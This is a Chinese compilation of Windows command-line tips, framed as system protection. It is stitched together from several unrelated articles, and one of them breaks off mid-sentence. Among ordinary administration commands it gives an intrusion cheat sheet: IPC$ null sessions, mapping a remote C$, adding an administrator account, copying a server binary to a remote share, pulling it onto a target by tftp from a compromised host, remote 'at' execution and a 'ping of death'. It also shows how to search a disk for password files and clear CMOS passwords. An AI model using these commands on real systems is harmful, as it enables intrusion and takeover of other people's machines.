教你利用Windows 命令行保护系统

根据笔者的经验，下面的这些工具对系统安全或网络管理大有可为。首先，启动命令提示符窗口。（单击“开始”/“运行”，输入“cmd.exe”，单击“确定”。 ）

1.sc stop 服务名，此命令可以终止某项Windows服务。如图1：

想要查看有哪些与进程有关的服务，请键入如下的命令：tasklist /svc。 2.ping IP地址–t：

探测指定的主机直至用户终止,这是查看对方主机是否活动的好方法。想查看统计数据并继续，按ctrl+Break键；想立即终止按ctrl+c键。如图2：

3.dir c:\\ /s /b | find “ssn”或dir c:\\ /s /b | find “password” 此命令在计算机c盘上查找所有的包含敏感文本“ssn”或“password”的文件。如图3：

4.findstr /s /i secret *.*或findstr /s /i confidential *.* 搜索当前目录及所有的子目录，查找机密信息“secret”或“confidential”。

5. nslookup –type=any 域名（不可使用IP地址） 如：nslookup –type=any ns.sdjnptt.net.cn，如下图4：

6.nbtstat –a 远程主机的IP地址，如nbtstat –a 192.168.1.23

如上图5所示，这个命令会显示一个远程系统的NetBIOS名称表、主机名、域名、MAC地址，如果可能还会显示当前登录的用户名。

7.net view 主机名，如net view thiscomputer，其作用是显示一个远程系统上的共享。

8.net accounts:显示本地用户账户的口令策略，如图6：

9.netsh interface ip set address name=\"Local Area Connection\" static 静态IP地址 子网掩码 默认网关

此命令用来更改计算机的IP地址或者配置TCP/IP的其它相关属性，如：

netsh interface ip set address name=\"Local Area Connection\" static 192.168.1.22 255.255.255.0 192.168.1.1

上面的命令为计算机的“本地连接”指定一个静态的IP地址：192.168.1.22，设置其子网掩码为255.255.255.0，并指定默认网关为192.168.1.1

10.netstat –a –o

此命令可以决定当前与拥有每个连接的进程ID一起使用的TCP和UDP连接，可以用于找出哪些应用程序正与谁会话。

当然，笔者在这里只是将此文作为一个引子，可以说是抛砖引玉。其实，命令提示行工具还有很多东西等待我们去探索和挖掘。

net use [url=file://ip/ipc$]\\\\ip\\ipc$[/url] \" \" /user:\" \" 建立IPC空链接

net use [url=file://ip/ipc$]\\\\ip\\ipc$[/url] \"密码\" /user:\"用户名\" 建立IPC非空链接

net use h: [url=file://ip/c$]\\\\ip\\c$[/url] \"密码\" /user:\"用户名\" 直接登陆后映射对方C：到本地为H:

net use h: [url=file://ip/c$]\\\\ip\\c$[/url] 登陆后映射对方C：到本地为H: net use [url=file://ip/ipc$]\\\\ip\\ipc$[/url] /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：***istrator后加s用复数 net start 查看开启了哪些服务

net start 服务名 开启服务；(如:net start telnet， net start schedule) net stop 服务名 停止某服务 net time \\\\目标ip 查看对方时间

net time \\\\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view [url=file://ip/]\\\\ip[/url] 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务

net send ip \"文本信息\" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符\\路径\\要移动的文件名 存放移动文件的路径\\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，\"> \"和\"> >\" 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务

at [url=file://ip/]\\\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\\文件名1 路径\\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\\srv.exe [url=file://ip/***$]\\\\ip\\***$[/url] 复制本地c:\\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy [url=file://ip/***$/svv.exe]\\\\ip\\***$\\svv.exe[/url] c:\\ 或:copy\\\\ip\\***$\\*.* 复制对方***i$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树 目标地址\\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP put c:\\server.exe 登陆后，上传本地c:\\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量 set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见if命令及变量） goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径\\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 echo 信息 在屏幕上显示出信息

echo 信息 >> pass.txt 将\"信息\"保存到pass.txt文件中 findstr \"Hello\" aa.txt 在aa.txt文件中寻找字符串hello find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\\、D:\\统一改为：EntSky\\ ) ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件 ren 原文件名 新文件名 重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 type 文件名 显示文本文件的内容 more 文件名 逐屏显示输出文件 doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； regedit /e 注册表文件名 导出注册表

cacls 文件名 参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名erm 替换指定用户的访问权限；/G 用户名erm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\est.txt /D pub 设定d:\est.txt拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地网络配置情况 IIS服务命令：

iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） iisreset /start或stop 启动（停止）所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务

iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 FTP 命令： (后面有详细说明内容) ftp的命令行格式为:

ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。 －d 使用调试方式。

－n ftp的自动登录,即不使用.netrc文件。 －g 取消全局文件名。

help [命令] 或 ？[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录 rename [from] [to] 改变远端主机中的文件名 rmdir directory-name 删除远端主机中的目录 status 显示当前FTP的状态 system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机 open host [port] 重新建立一个新的连接 prompt 交互提示模式 macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 cd remote－dir 进入远程主机目录 cdup 进入远程主机目录的父目录

! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip MYSQL 命令：

mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。

（例：mysql -h110.110.110.110 -Uroot -P 注:u与root可以不用加空格，其它也一样） exit 退出MYSQL

mysql*** -u用户名 -p旧密码 password 新密码 修改密码

grant select on 数据库.* to 用户名@登录主机 identified by \\\"密码\\\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 netstat增加了o参数后，Win2003 SP1和XP SP2（未测试）又增加了一个新的参数－\"b\"，还是非常好用的，可以显示出进程名了。

netstat /?

显示协议统计信息和当前 TCP/IP 网络连接。

NETSTAT [-a] [-b] [-e] [-n] [-o] [-p proto] [-r] [-s] [-v] [interval]

-a 显示所有连接和监听端口。

-b 显示包含于创建每个连接或监听端口的可执行组件。在某些情况下已知可执行组件拥有多个组件，并且在这些情况下包含于创建连接或监听端口的组件序列被显示。这种情况下，可执行组件名在底部的 [] 中，顶部是其调用的组件，等等，直到 TCP/IP 部分。注意此选项可能需要很长时间，如果没有足够权限可能失败。

-e 显示以太网统计信息。此选项可以与 -s选项组合使用。

-n 以数字形式显示地址和端口号。

-o 显示与每个连接相关的所属进程 ID。

-p proto 显示 proto 指定的协议的连接；proto 可以是下列协议之一: TCP、UDP、TCPv6 或 UDPv6。

如果与 -s 选项一起使用以显示按协议统计信息，proto 可以是下列协议之一:

IP、IPv6、ICMP、ICMPv6、TCP、TCPv6、UDP 或 UDPv6。

-r 显示路由表。

-s 显示按协议统计信息。默认地，显示 IP、

IPv6、ICMP、ICMPv6、TCP、TCPv6、UDP 和 UDPv6 的统计信息；

-p 选项用于指定默认情况的子集。

-v 与 -b 选项一起使用时将显示包含于为所有可执行组件创建连接或监听端口的组件。

interval 重新显示选定统计信息，每次显示之间暂停时间间隔(以秒计)。按 CTRL+C 停止重新显示统计信息。如果省略，netstat 显示当前配置信息(只显示一次)

常常有些用户为了试验自己新学到的PC技巧，对自己的电脑进行各种操作，例如设置密码或隐藏文件，然而一旦忘记了密码，或者无法恢复隐藏的文件，就会影响到电脑的正常使用。以下有一些小技巧，在你遇到这种麻烦的时候不妨尝试一下突破各种“封锁”。

去除CMOS密码

为了便于管理，增强计算机保密性，人们常常对自己的计算机设置CMOS口令，但一旦遗忘了口令或被别人恶意设置密码，该怎么办？用启动软盘启动电脑，在软盘中必须有debug.exe这个文件，然后用键盘输入“debug”，回车，运行debug调试程序，接着键入如下内容（如图1）：

-o 70 16 -o 71 16 -q 或

—o 70 21 —o 71 21 —q

然后重启，密码就被解除了。要注意的是，如果设置了开机密码，那只能根据主板跳线进行短接，具体方法参照主板说明书。

显示启动菜单

为了防止别人用安全模式调试电脑，有的用户屏蔽了启动菜单。如果日后又希望显示启动菜单，可以通过修改msdos.sys来实现。

步骤一 在Windows桌面态下，依次打开“开始”|“设置”|“文件夹选项”|“查看”（如图2），选择显示所有文件；

步骤二 把c:\\msdos.sys文件的只读属性和隐藏属性去掉；

步骤三 用记事本打开msdos.sys，把BootKeys＝0改为BootKeys＝1（1表示启动时，按F8键显示启动菜单）。存盘退出即可。

去除开机屏保密码

有些用户通过一些设置，让屏幕保护程序在开机的时候自动运行，同时设置了屏幕保护密码，一动鼠标或键盘，便会要求输入密码，使用户无法登录Windows。一旦忘记密码，挽救的方法有两种：

方法一 在系统启动的时候，按F8键弹出系统启动菜单，选择Safe Mode（安全模式）。进入Windows后，然后右击桌面空白处并从弹出的快捷菜单中执行“属性”命令，打开“显示属性”设置框，并单击“屏幕保护程序”选项卡（如图3），把“密码保护”前的对勾去掉。重新启动计算机。

方法二 如果能登录Windows，我们可以用上面的方法。如果只能进入DOS（用软盘启动也可以），也能解除其密码。因为在注册表里 HKEY_CURRENT_USER\\ControlPan

el\\desktop\\分支下的ScreenSaveUsePassword这个键值控制是否使用屏幕保护密码，0为不设密码，1则为使用预设的密码。因此在DOS状态下，输入Regedit/e a.reg KEY_CURRENT_USER，其作用是把KEY_CURRENT_USER分支下的内容全部导出到a.reg文件中，然后用DOS编辑器edit.exe打开a.reg（方法是：edit a.reg），在HKEY_CURRENT_USER\\ControlPanel\\desktop下，把ScreenSaveUsePassword后面的1改为0（如图4），存盘退出。接着运行regedit a.reg，把修改的内容导入注册表。最后重新启动电脑。需要注意，regedit.exe在系统盘下的\\windows\\system文件夹下。

匿名登录

在公共场所的学校、网吧等，许多人公用一台电脑，一般电脑会允许匿名登录，但是有的人为了显示自己的电脑水平或独占电脑，取消了匿名登录，恢复方法有两种：

方法一 在安全模式下，在运行框里输入Regedit回车。找到HKEY_LOCAL_MACHINE

\\NETWORK\\LOGON主键，把键名“MustBeValidated”删掉，或双击打开，把键值改为0。

方法二 在DOS状态下，仿照“去除开机屏保密码”的第二种方法，把HKEY_LOCAL_MACHINE\\NETWORK\\LOGON分支下的内容导入到一个文件中，用Dos编辑器打开，把MustBeValidated后的1改为0，然后导入注册表即可。

解锁注册表

Windows里许多保护设置都是通过修改注册表而达到目的。因此，要想把一些设置修改回来必须利用注册表。如果注册表被锁住的话，必须解锁。其步骤是：

打开记事本，在里面输入以下内容：

REGEDIT4

[HKEY_CURRENT_USER\\Software\\MicrosoftWindows\\CurrentVersion\\Policies\\System]

\"DisableRegistryTools\"=dword:

在保存的时候，类型选择“所有文件”，输入文件名的扩展名为reg。在解锁的时候，双击这个文件，选择把信息输入注册表即可解锁。

使用的硬件

为了保护系统免受病毒的侵扰，或防止他人乱用光驱、软驱安装程序，有些用户选择屏蔽光驱或软驱，结果干扰了正常用户的使用。下面这几种方法可以帮助你把光驱或软驱找回来。

软驱

情况一 在CMOS设置中被屏蔽

电脑启动的时候，按Del键进入CMOS，在STANDARD CMOS SETUP上回车，然后利用方向键把修改滑块移动到Drive A的右侧，按键盘上Page Down键，切换软驱的类型（如图5），保存退出。

情况二 在AUTOEXE.bat中被屏蔽

用记事本打开c:\\autoexec.bat这个文件，如果有subst这个命令，把它所在的行删除，保存退出，重新启动电脑。也可在命令运行框输入subst A:/d回车，但每次启动电脑必须进行这项操作。

光驱

步骤一 用记事本打开c:\\config.sys，把lastdrive所在的行全部删除，然后重新启动电脑。

步骤二 依次打开“控制面板”|“系统”|“设备管理”|“硬盘控制

器”|“VIA BUS Master PCI IDE Controller(因主板芯片的不同，可能不尽相同）”|“设置”（如图6），选择默认值。

步骤三 在系统启动的时候，按DEL键进入CMOS，在主菜单中打开Integrated Peripherals这一项，把Onchip Secondary PCI IDE设置为Enabled(如图7)，表示启用主板上的从属IDE接口，因为光驱一般接在这个接口上。

步骤四 如果在Windows 98的虚拟DOS模式下能访问光驱，在Windows里却不能，可运行注册表编辑器，依次打开主键HKEY_LOCAL_MACHINE\\Software\\Microsoft

Windows\\CurrentVersion\\Policies\\Explorer，把键NoDrives删除或把键值修改为0（0表示不隐藏任何盘符，如果硬盘、软盘或虚拟光驱的盘符怀疑被隐藏了，可以看看这个键值是否为0）。

显示隐藏文件夹（文件)

如果文件的属性值在注册表里被修改了，即使在文件夹选项里设置为显示所有文件，被隐藏的文件也不会显示。可运行注册表编辑器，打开主键HKEY_LOCAL_MACHINE

\\Software\\Microsoft\\Windows\\CurrentVersion

explorer\\Advanced\\Folder\\Hidden，把主键SHOWALL下的键CheckedValue的值改为1，同时还要把主键NOHIDDEN和NOHIDORSYS下的键CheckedValue其键值为0。这样就恢复了windows原来的设置。□

● 显示“开始”菜单中的菜单项

运行注册表编辑器，找到主键HKEY_LO

CAL_MACHINE\\Software\\Microsoft\\Windows

\\CurrentVersion\\Policies\\Explorer，把下列键值设为0可恢复显示。

显示“开始”设置中的“任务栏和开始菜单”——NoSetTaskbar

显示“开始”设置中的“查找”—NoFind

显示“开始”设置中的“运行”—NoRunn

显示“开始”设置中的“关闭系统”—NoClose

显示“开始”设置中的“打印机和控制面板”—NosetFolders

显示“关闭系统”中的“重新启动计算机并切换到MS-DOS方式”—运行注册表编辑器，打开主键HKEY_CURRENT_USER\\Softw

are\\Microsoft\\Windows\\CurrentVersion

Policies\\WinOldApp，把键NoRealMode的值修改为0。

● 显示“显示属性”中的页面项

运行注册表编辑器，进入HKEY_CURRENT_USER\\Software\\Microsoft\\Windo

ws\\CurrentVersion\\Policies\\system/后，把以下键值改为0时即可恢复显示。

显示“WEB”、“设置”、“效果”—NoDispSettingsPage

显示“屏幕保护程序”属性项—NoDispScrSavPage

显示“背景”属性项—NoDispBackgroundPage

显示“外观”属性项—NoDispAppearancePage

● 显示“系统”属性中的项目

运行注册表编辑器，打开主键HKEY_CURRENT_USER\\Software\\Microsoft\\Wi

ndows\\CurrentVersion\\Policies\\System，把以下键值改为0即可恢复显示。

显示“系统”属性中的“设备管理”——NoDevMgrPage

显示“系统”属性中的“硬件配置文件”—NoConfigPage

显示“系统”属性“性能”项中的“文件系统”按钮—NoFileSysPage

显示“系统”属性“性能”页中的“虚拟内存”按钮—NoVirtMemPage

● 显示网络属性中的选项

运行注册表编辑器，打开主键HKEY_CURRENT_USER\\Software\\Microsoft\\Wi

ndows\\CurrentVersion\\Policies\\Network，把以下键值改为0即可恢复显示。

显示“网上邻居”中的“整个网络”—NoEntireNetwork

显示“网络”属性中的“标识”—NoNetSetupIDPage

显示“网络”属性中的“访问控

1.最基本，最常用的，测试物理网络的 PING

ping 192.168.0.8 －t ，参数－t是等待用户去中断测试

2.查看DNS、IP、Mac等

A.Win98：winipcfg

B.Win2000以上：Ipconfig/all

C.NSLOOKUP：如查看河北的DNS C:\\>nslookup

Default Server: ns.hesjptt.net.cn Address: 202.99.160.68

>server 202.99.41.2 则将DNS改为了41.2 > pop.pcpop.com

Server: ns.hesjptt.net.cn Address: 202.99.160.68

Non-authoritative answer: Name: pop.pcpop.com Address: 202.99.160.212

3.网络信使 （经常有人问的~）

Net send 计算机名/IP * (广播) 传送内容，注意不能跨网段 net stop messenger 停止信使服务，也可以在面板－服务修改 net start messenger 开始信使服务

4.探测对方对方计算机名，所在的组、域及当前用户名 （追捕的工作原理） ping －a IP －t ，只显示NetBios名 nbtstat -a 192.168.10.146 比较全的

5.netstat -a 显示出你的计算机当前所开放的所有端口

netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等

6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址 arp -a

7.在代理服务器端

捆绑IP和MAC地址，解决局域网内盗用IP！： ARP －s 192.168.10.59 00 －50－ff－6c－08－75 解除网卡的IP与MAC地址的绑定： arp -d 网卡IP

8.在网络邻居上隐藏你的计算机 （让人家看不见你！） net config server /hidden:yes

net config server /hidden:no 则为开启

9.几个net命令

A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域

或网络上的计算机上的列表。

比如：查看这个IP上的共享资源，就可以 C:\\>net view 192.168.10.8 在 192.168.10.8 的共享资源 资源共享名 类型 用途 注释 -------------------------------------- 网站服务 Disk 命令成功完成。

B.查看计算机上的用户帐号列表 net user C.查看网络链接 net use

例如：net use z: \\\\192.168.10.8\\movie 将这个IP的movie共享目录映射为本地的Z盘

D.记录链接 net session 例如：

C:\\>net session

计算机 用户名 客户类型 打开空闲时间

------------------------------------------------------------------------------- \\\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12

\\\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39 命令成功完成。

10.路由跟踪命令

A.tracert pop.pcpop.com

B.pathping pop.pcpop.com 除了显示路由外，还提供325S的分析，计算丢失包的％

11.关于共享安全的几个命令

A.查看你机器的共享资源 net share

B.手工删除共享（可以编个bat文件，开机自运行，把共享都删了！） net share c$ /d net share d$ /d net share ipc$ /d net share admin$ /d 注意$后有空格。 C.增加一个共享：

c:\\net share mymovie=e:\\downloads\\movie /users:1 mymovie 共享成功。

同时链接用户数为1人。

12.在DOS行下设置静态IP

A.设置静态IP

CMD netsh netsh>int interface>ip

interface ip>set add \"本地链接\" static IP地址 mask gateway B.查看IP设置

interface ip>show address Arp

显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表，它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用，则 arp 命令将显示帮助信息。 语法

arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]] 参数

-a [InetAddr] [-N IfaceAddr]

显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项，请使用带有 InetAddr 参数的 arp -a，此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表，请使用 -N IfaceAddr 参数，此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。

-g [InetAddr] [-N IfaceAddr] 与 -a 相同。

-d InetAddr [IfaceAddr]

删除指定的 IP 地址项，此处的 InetAddr 代表 IP 地址。对于指定的接口，要删除表中的某项，请使用 IfaceAddr 参数，此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项，请使用星号 (*) 通配符代替 InetAddr。

-s InetAddr EtherAddr [IfaceAddr]

向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项，请使用 IfaceAddr 参数，此处的 IfaceAddr 代表分配给该接口的 IP 地址。 /?

在命令提示符显示帮助。 注释

InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。

物理地址 EtherAddr 由六个字节组成，这些字节用十六进制记数法表示并且用连字符隔开（比如，00-AA-00-4F-2A-9C）。

通过 -s 参数添加的项属于静态项，它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动，这些项会被删除。要创建永久的静态 ARP 缓存项，请在批处理文件中使用适当的 arp 命令并通过“计划任务程序”在启动时运行该批处理文件。

只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时，该命令才可用。 范例

要显示所有接口的 ARP 缓存表，可键入：

arp -a

对于指派的 IP 地址为 10.0.0.99 的接口，要显示其 ARP 缓存表，可键入：

arp -a -N 10.0.0.99

要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项，可键入：

arp -s 10.0.0.80 00-AA-00-4F-2A-9C At

计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在“计划”服务运行时使用。如果在没有参数的情况下使用，则 at 列出已计划的命令。 语法

at [\\\\ComputerName] [{[ID] [/delete] /delete [/yes]}]

at [[\\\\ComputerName] hours:minutes [/interactive] [{/every:date[,...] /next:date[,...]}] command] 参数

\\\\computername

指定远程计算机。如果省略该参数，则 at 计划本地计算机上的命令和程序。 ID

指定指派给已计划命令的识别码。 /delete

取消已计划的命令。如果省略了 ID，则计算机中所有已计划的命令将被取消。 /yes

删除已计划的事件时，对来自系统的所有询问都回答“是”。

hours:minutes

指定命令运行的时间。该时间用 24 小时制（即从 00:00 [午夜] 到 23:59）的 小时: 分钟格式表示。 /interactive

对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。 /every:

在每个星期或月的指定日期（例如，每个星期四，或每月的第三天）运行 command 命令。

date

指定运行命令的日期。可以指定一周的某日或多日（即，键入 M、T、W、Th、F、S、Su）或一个月中的某日或多日（即，键入从 1 到31 之间的数字）。用逗号分隔多个日期项。如果省略了 date，则 at 使用该月的当前日。 /next:

在下一个指定日期（比如，下一个星期四）到来时运行 command。

command

指定要运行的 Windows 命令、程序（.exe 或 .com 文件）或批处理程序（.bat 或 .cmd 文件）。当命令需要路径作为参数时，请使用绝对路径，也就是从驱动器号开始的整个路径。如果命令在远程计算机上，请指定服务器和共享名的通用命名协定 (UNC) 符号，而不是远程驱动器号。 /?

在命令提示符显示帮助。 注释

Schtasks 是功能更为强大的超集命令行计划工具，它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务，都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息，请参阅“相关主题”。

使用 at

使用 at 命令时，要求您必须是本地 Administrators 组的成员。

加载 Cmd.exe

在运行命令之前，At 不会自动加载 Cmd.exe （命令解释器）。如果没有运行可执行文件 (.exe)，则在命令开头必须使用如下所示的方法专门加载 Cmd.exe：

cmd /c dir > c:\est.out。

查看已计划的命令

当不带命令行选项使用 at 时，计划任务会出现在类似于以下格式的表中：

Status ID Day Time Command Line

OK 1 Each F 4:30 PM net send group leads status due OK 2 Each M 12:00 AM chkstor > check.file OK 3 Each F 11:59 PM backup2.bat 包含标识号 (ID) 当在命令提

Netstat

